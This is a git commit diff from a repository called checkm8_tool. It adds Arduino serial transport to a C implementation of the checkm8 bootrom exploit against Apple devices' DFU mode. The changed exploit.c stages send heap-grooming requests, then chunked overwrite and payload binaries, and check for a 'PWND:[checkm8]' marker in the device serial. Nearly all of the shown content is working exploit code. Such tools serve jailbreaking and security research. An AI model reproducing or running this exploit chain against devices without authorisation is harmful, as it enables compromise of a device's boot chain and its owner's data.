grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

So many arduino integration changes...

Browse Source
This commit is contained in:
Gregor Haas
2019-12-29 19:56:09 -05:00
parent 5f3cb1b041
commit fa6d1a2af1
10 changed files with 692 additions and 452 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
checkm8_remote/include/checkm8.h
View File

@@ -10,6 +10,7 @@
#define CHECKM8_FAIL_NOTDONE -4
#define CHECKM8_FAIL_XFER -5
#define CHECKM8_FAIL_NOINST -6
#define CHECKM8_FAIL_PROT -7
#define IS_CHECKM8_FAIL(code) code < 0

14
checkm8_remote/include/usb_helpers.h
View File

@@ -2,7 +2,12 @@
#define CHECKM8_TOOL_LIBUSB_HELPERS_H
#include "checkm8.h"
#define LIBUSB_MAX_PACKET_SIZE 0x800
#ifdef WITH_ARDUINO
#define MAX_PACKET_SIZE 512
#else
#define MAX_PACKET_SIZE 0x800
#endif
#ifndef WITH_ARDUINO
#include "libusb.h"
@@ -32,6 +37,12 @@ int no_error_ctrl_transfer(struct pwned_device *dev,
unsigned char *data, unsigned short data_len,
unsigned int timeout);
int no_error_ctrl_transfer_data(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout);
int ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
@@ -41,5 +52,4 @@ int ctrl_transfer(struct pwned_device *dev,
int reset(struct pwned_device *dev);
int serial_descriptor(struct pwned_device *dev, unsigned char *serial_buf, int len);
#endif //CHECKM8_TOOL_LIBUSB_HELPERS_H

2
checkm8_remote/src/command.c
View File

@@ -20,7 +20,7 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
while(index < data_len)
{
if(data_len - index >= LIBUSB_MAX_PACKET_SIZE) amount = LIBUSB_MAX_PACKET_SIZE;
if(data_len - index >= MAX_PACKET_SIZE) amount = MAX_PACKET_SIZE;
else amount = data_len - index;
checkm8_debug_indent("\tsending chunk of size %li at index %li\n", amount, index);

66
checkm8_remote/src/exploit.c
View File

@@ -125,7 +125,6 @@ int stage1_function(struct pwned_device *dev)
usb_req_leak(dev);
no_leak(dev);
checkm8_debug_indent("\treset\n");
reset(dev);
return CHECKM8_SUCCESS;
}
@@ -138,36 +137,63 @@ int stage2_function(struct pwned_device *dev)
partial_ctrl_transfer(dev, 0x21, 1, 0, 0, databuf, 0x800, 1);
no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0);
checkm8_debug_indent("\treset\n");
reset(dev);
return CHECKM8_SUCCESS;
}
int stage3_function(struct pwned_device *dev)
{
long index = 0, amount = 0;
long ow_len, pl_len;
checkm8_debug_indent("exploit stage 3\n");
unsigned char overwrite_buf[1524];
FILE *overwrite_file = fopen(CHECKM8_BIN_BASE "overwrite.bin", "r");
fread(overwrite_buf, 1524, 1, overwrite_file);
fseek(overwrite_file, 0, SEEK_END);
ow_len = ftell(overwrite_file);
rewind(overwrite_file);
unsigned char overwrite_buf[ow_len];
fread(overwrite_buf, ow_len, 1, overwrite_file);
fclose(overwrite_file);
unsigned char payload_buf[2400];
FILE *payload_file = fopen(CHECKM8_BIN_BASE "payload.bin", "r");
fread(payload_buf, 2400, 1, payload_file);
fseek(payload_file, 0, SEEK_END);
pl_len = ftell(payload_file);
rewind(payload_file);
unsigned char payload_buf[pl_len];
fread(payload_buf, pl_len, 1, payload_file);
fclose(payload_file);
usb_req_stall(dev);
usb_req_leak(dev);
checkm8_debug_indent("\ttransferring overwrite\n");
no_error_ctrl_transfer(dev, 0, 0, 0, 0, overwrite_buf, 1524, 100);
checkm8_debug_indent("\ttransferring overwrite (%i bytes)\n", ow_len);
while(index < ow_len)
{
if(ow_len - index >= MAX_PACKET_SIZE) amount = MAX_PACKET_SIZE;
else amount = ow_len - index;
checkm8_debug_indent("\tbytes %i to %i\n", index, index + amount);
checkm8_debug_indent("\ttransferring payload\n");
no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, payload_buf, 2048, 100);
no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
no_error_ctrl_transfer_data(dev, 0, 0, 0, 0, &overwrite_buf[index], amount, 100);
index += amount;
}
index = 0;
amount = 0;
checkm8_debug_indent("\ttransferring payload (%i bytes)\n", pl_len);
while(index < pl_len)
{
if(pl_len - index >= MAX_PACKET_SIZE) amount = MAX_PACKET_SIZE;
else amount = pl_len - index;
checkm8_debug_indent("\tbytes %i to %i\n", index, index + amount);
no_error_ctrl_transfer_data(dev, 0x21, 1, 0, 0, &payload_buf[index], amount, 100);
index += amount;
}
checkm8_debug_indent("reset\n");
reset(dev);
return CHECKM8_SUCCESS;
}
@@ -177,15 +203,15 @@ int check_function(struct pwned_device *dev)
checkm8_debug_indent("checking device serial\n");
unsigned char serial_buf[128];
unsigned int i;
int ret;
ret = serial_descriptor(dev, serial_buf, sizeof(serial_buf));
if(IS_CHECKM8_FAIL(ret)) return ret;
serial_descriptor(dev, serial_buf, sizeof(serial_buf));
checkm8_debug_indent("\tgot serial %s\n", serial_buf);
for(i = 0; i < 13; i++)
{
if(serial_buf[99 + i] != "PWND:[checkm8]"[i])
{
return CHECKM8_FAIL_NOEXP;
}
if(serial_buf[99 + i] != "PWND:[checkm8]"[i]) return CHECKM8_FAIL_NOEXP;
}
return CHECKM8_SUCCESS;
@@ -217,14 +243,14 @@ struct pwned_device *exploit_device()
ret = check_function(res);
if(ret == CHECKM8_SUCCESS)
{
// already exploited
checkm8_debug_indent("\tdevice is already exploited\n");
res->status = DEV_PWNED;
close_device_session(res);
return res;
}
else if(ret == CHECKM8_FAIL_NODEV)
{
// no device found
checkm8_debug_indent("\tno device found\n");
free_device(res);
return NULL;
}

269
checkm8_remote/src/usb_helpers.c
View File

@@ -1,14 +1,16 @@
#include "usb_helpers.h"
#include <string.h>
#ifdef WITH_ARDUINO
#include <termio.h>
#include <fcntl.h>
#include <unistd.h>
#include "ard_protocol.h"
#else
#include <string.h>
#include <stdlib.h>
#include "libusbi.h"
@@ -91,21 +93,15 @@ int open_device_session(struct pwned_device *dev)
// read a setup verification byte
while(read(ard_fd, &buf, 1) == 0);
if(buf == '\x00')
if(buf == PROT_SUCCESS)
{
checkm8_debug_block("\tarduino successfully setup\n");
checkm8_debug_indent("\tarduino successfully setup\n");
dev->ard_fd = ard_fd;
return CHECKM8_SUCCESS;
}
else
else if(buf == PROT_FAIL_INITUSB)
{
checkm8_debug_indent("\tarduino error: ");
while(buf != '\n')
{
checkm8_debug_block("%c", buf);
while(read(ard_fd, &buf, 1) == 0);
}
checkm8_debug_indent("\tarduino failed to init USB host shield\n");
close(ard_fd);
return CHECKM8_FAIL_NOTDONE;
}
@@ -251,7 +247,47 @@ int partial_ctrl_transfer(struct pwned_device *dev,
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#ifdef WITH_ARDUINO
char buf;
struct usb_xfer_args args;
args.bmRequestType = bmRequestType;
args.bRequest = bRequest;
args.wValue = wValue;
args.wIndex = wIndex;
args.data_len = data_len;
checkm8_debug_indent("\tsending data to arduino\n");
write(dev->ard_fd, &PROT_PARTIAL_CTRL_XFER, 1);
write(dev->ard_fd, &args, sizeof(struct usb_xfer_args));
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_ACK)
{
checkm8_debug_indent("\treceived ack\n");
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_SUCCESS)
{
checkm8_debug_indent("\tsuccess\n");
return CHECKM8_SUCCESS;
}
else if(buf == PROT_FAIL_USB)
{
while(read(dev->ard_fd, &buf, 1) == 0);
checkm8_debug_indent("\trequest failed with error %X\n", buf);
return CHECKM8_FAIL_XFER;
}
else
{
checkm8_debug_indent("\tunexpected response %X\n", buf);
return CHECKM8_FAIL_PROT;
}
}
else
{
checkm8_debug_indent("\tno ack received (got %x)\n", buf);
return CHECKM8_FAIL_PROT;
}
#else
struct timeval start, end;
unsigned char usb_transfer_buf[8 + data_len];
@@ -302,7 +338,40 @@ int no_error_ctrl_transfer(struct pwned_device *dev,
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#ifdef WITH_ARDUINO
unsigned char buf;
struct usb_xfer_args args;
args.bmRequestType = bmRequestType;
args.bRequest = bRequest;
args.wValue = wValue;
args.wIndex = wIndex;
args.data_len = data_len;
checkm8_debug_indent("\tsending data to arduino\n");
write(dev->ard_fd, &PROT_NO_ERROR_CTRL_XFER, 1);
write(dev->ard_fd, &args, sizeof(struct usb_xfer_args));
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_ACK)
{
checkm8_debug_indent("\treceived ack\n");
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_SUCCESS)
{
checkm8_debug_indent("\tsuccess\n");
return CHECKM8_SUCCESS;
}
else
{
checkm8_debug_indent("\tunexpected response %X\n", buf);
return CHECKM8_FAIL_PROT;
}
}
else
{
checkm8_debug_indent("\tno ack received (got %x)\n", buf);
return CHECKM8_FAIL_PROT;
}
#else
int ret;
unsigned char recipient = bmRequestType & 3u;
@@ -324,6 +393,61 @@ int no_error_ctrl_transfer(struct pwned_device *dev,
#endif
}
int no_error_ctrl_transfer_data(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout)
{
checkm8_debug_indent(
"no_error_ctrl_transfer_data(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#ifdef WITH_ARDUINO
char buf;
struct usb_xfer_args args;
args.bmRequestType = bmRequestType;
args.bRequest = bRequest;
args.wValue = wValue;
args.wIndex = wIndex;
args.data_len = data_len;
checkm8_debug_indent("\tsending data to arduino\n");
write(dev->ard_fd, &PROT_NO_ERROR_CTRL_XFER_DATA, 1);
write(dev->ard_fd, &args, sizeof(struct usb_xfer_args));
write(dev->ard_fd, data, data_len);
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_ACK)
{
checkm8_debug_indent("\treceived ack\n");
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_FAIL_TOOBIG)
{
checkm8_debug_indent("\tdata packet is too big\n");
return CHECKM8_FAIL_INVARGS;
}
else if(buf == PROT_SUCCESS)
{
checkm8_debug_indent("\tsuccess\n");
return CHECKM8_SUCCESS;
}
else
{
checkm8_debug_indent("\tunexpected response %X\n", buf);
return CHECKM8_FAIL_PROT;
}
}
else
{
checkm8_debug_indent("\tno ack received (got %x)\n", buf);
return CHECKM8_FAIL_PROT;
}
#else
return no_error_ctrl_transfer(dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#endif
}
int ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
@@ -335,7 +459,51 @@ int ctrl_transfer(struct pwned_device *dev,
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#ifdef WITH_ARDUINO
// TODO
char buf;
struct usb_xfer_args args;
args.bmRequestType = bmRequestType;
args.bRequest = bRequest;
args.wValue = wValue;
args.wIndex = wIndex;
args.data_len = data_len;
checkm8_debug_indent("\tsending data to arduino\n");
write(dev->ard_fd, &PROT_CTRL_XFER, 1);
write(dev->ard_fd, &args, sizeof(struct usb_xfer_args));
write(dev->ard_fd, data, data_len);
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_ACK)
{
checkm8_debug_indent("\treceived ack\n");
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_FAIL_TOOBIG)
{
checkm8_debug_indent("\tdata packet is too big\n");
return CHECKM8_FAIL_INVARGS;
}
else if(buf == PROT_FAIL_USB)
{
while(read(dev->ard_fd, &buf, 1) == 0);
checkm8_debug_indent("\tUSB failed with error %x\n", buf);
}
else if(buf == PROT_SUCCESS)
{
checkm8_debug_indent("\tsuccess\n");
return CHECKM8_SUCCESS;
}
else
{
checkm8_debug_indent("\tunexpected response %X\n", buf);
return CHECKM8_FAIL_PROT;
}
}
else
{
checkm8_debug_indent("\tno ack received (got %x)\n", buf);
return CHECKM8_FAIL_PROT;
}
#else
return libusb_control_transfer(dev->bundle->handle,
bmRequestType, bRequest,
@@ -347,8 +515,33 @@ int ctrl_transfer(struct pwned_device *dev,
int reset(struct pwned_device *dev)
{
checkm8_debug_indent("reset(dev = %p)\n", dev);
#ifdef WITH_ARDUINO
char buf;
write(dev->ard_fd, &PROT_RESET, 1);
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_ACK)
{
checkm8_debug_indent("\treceived ack\n");
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_SUCCESS)
{
checkm8_debug_indent("\tsuccess\n");
return CHECKM8_SUCCESS;
}
else
{
checkm8_debug_indent("\tunexpected response %X\n", buf);
return CHECKM8_FAIL_PROT;
}
}
else
{
checkm8_debug_indent("\tno ack received (got %x)\n", buf);
return CHECKM8_FAIL_PROT;
}
#else
return libusb_reset_device(dev->bundle->handle);
#endif
@@ -356,8 +549,58 @@ int reset(struct pwned_device *dev)
int serial_descriptor(struct pwned_device *dev, unsigned char *serial_buf, int len)
{
#ifdef WITH_ARDUINO
checkm8_debug_indent("serial_descriptor(dev = %p, serial_buf = %p, len = %i)\n", dev, serial_buf, len);
#ifdef WITH_ARDUINO
char buf;
int curr, ret;
struct serial_desc_args args;
args.dev_idVendor = dev->idVendor;
args.dev_idProduct = dev->idProduct;
args.len = len;
checkm8_debug_indent("\tsending data to arduino\n");
write(dev->ard_fd, &PROT_SERIAL_DESC, 1);
write(dev->ard_fd, &args, sizeof(struct serial_desc_args));
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_ACK)
{
checkm8_debug_indent("\treceived ack\n");
while(read(dev->ard_fd, &buf, 1) == 0);
if(buf == PROT_FAIL_NODEV)
{
checkm8_debug_indent("\tno device attached\n");
return CHECKM8_FAIL_NODEV;
}
else if(buf == PROT_FAIL_WRONGDEV)
{
checkm8_debug_indent("\twrong device attached\n");
return CHECKM8_FAIL_NODEV;
}
else if(buf == PROT_SUCCESS)
{
checkm8_debug_indent("\tsuccess, reading serial descriptor\n");
curr = 0;
while(curr < len)
{
ret = read(dev->ard_fd, &serial_buf[curr], len - curr);
if(ret > 0) curr += ret;
}
return CHECKM8_SUCCESS;
}
else
{
checkm8_debug_indent("\tunexpected response %X\n", buf);
return CHECKM8_FAIL_PROT;
}
}
else
{
checkm8_debug_indent("\tno ack received (got %x)\n", buf);
return CHECKM8_FAIL_PROT;
}
#else
struct libusb_device_handle *handle = dev->bundle->handle;
struct libusb_device_descriptor *desc = dev->bundle->descriptor;